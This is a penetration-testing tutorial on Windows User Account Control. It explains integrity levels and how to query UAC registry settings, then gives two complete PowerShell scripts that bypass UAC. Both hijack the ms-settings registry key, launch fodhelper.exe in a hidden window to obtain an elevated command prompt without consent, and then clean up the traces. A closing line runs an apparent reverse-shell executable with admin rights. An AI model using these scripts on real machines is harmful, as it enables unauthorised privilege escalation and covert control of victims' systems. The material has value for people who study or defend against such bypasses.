User Account Control (UAC) is an access control system that forces applications and tasks to run in the context of a non-administrative account until an administrator authorizes elevated access.
UAC was first introduced in Windows Vista and attracted complaints from users due to the frequency and annoyance of the popups, which led Microsoft to introduce some relaxations.
Mandatory Levels
Exists three types of Mandatory Level:
whoami /all
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Low Mandatory Level Unknown SID type S-1-16-4096 Mandatory group, Enabled by default, Enabled group
- Low Mandatory Level: Services like IE has no permissions, it can not write on any directory, but IE for example need to write cache on a directory. So with Low Mandatory Level we will only able to write data on the following path.
C:\Users\Victim\AppData\LocalLow - Medium Mandatory Level: Permissions as a normal user.
- High Mandatory Level: Permissions as NT AUTHORITY/SYSTEM.
UAC Bypass
Some of the own trusted signed applications are able to “auto-elevate” without consent in certain conditions.
The default configuration for UAC is Prompt for consent for non-Windows binaries, but can also have different settings such as Prompt for credentials, Prompt for consent and Elevate without prompting.
We can check UAC configuration with powershell.
$path = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
$filter="ConsentPromptBehaviorAdmin|ConsentPromptBehaviorUser|EnableInstallerDetection|EnableLUA|EnableVirtualization|PromptOnSecureDesktop|ValidateAdminCodeSignatures|FilterAdministratorToken"
(Get-ItemProperty $path).psobject.properties | where {$_.name -match $filter} | select name,value
Name Value
---- -----
ConsentPromptBehaviorAdmin 5
ConsentPromptBehaviorUser 3
EnableInstallerDetection 1
EnableLUA 1
EnableVirtualization 1
PromptOnSecureDesktop 1
ValidateAdminCodeSignatures 0
We are interested in ConsentPromptBehaviorAdmin parameter.
| Value | Meaning |
|---|---|
| 0 | Elevate without prompting |
| 1 | Prompt for credentials (Secure Desktop) |
| 2 | Prompt for consent (Secure Desktop) |
| 3 | Prompt for credentials |
| 4 | Prompt for consent |
| 5 (Default) | Prompt for consent non-windows binaries |
A UAC bypass is a technique by which an application can go from Medium Integrity to High Integrity without prompting for consent.
fodhelper.exe
fodhelper.exe is a Microsoft support application responsible for managing language changes in the operating system. This binary runs as high integrity on Windows 10.
With sigcheck.exe from SysInternals is posible to inspect the application manifest.
sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
Note: Search for
requestedExecutionLevelasrequireAdministratorandautoElevateintrue.
#This UAC bypass tries to execute your command with elevated privileges using fodhelper.exe
$command = "C:\Windows\System32\cmd.exe"
#Adding all the reistry required with your command.
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
#Starts the fodhelper process to execute your command.
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
#Cleaning up the mess created.
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
There are an alternative with Ps1.
<#
.SYNOPSIS
This script can bypass User Access Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
.EXAMPLE
Load "cmd /c start C:\Windows\System32\cmd.exe" (it's default):
FodhelperUACBypass
Load specific application:
FodhelperUACBypass -program "cmd.exe"
FodhelperUACBypass -program "cmd.exe /c powershell.exe"
#>
function FodhelperUACBypass(){
Param (
[String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default
)
#Create Registry Structure
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
#Start fodhelper.exe
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
#Cleanup
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}
Start-Process RunAs
It is possible to execute a command as admin if we are able to access to the GUI.
Start-Process powershell -ArgumentList "-NoProfile", "-Command", "c:\windows\temp\rshell.exe" -Verb runAs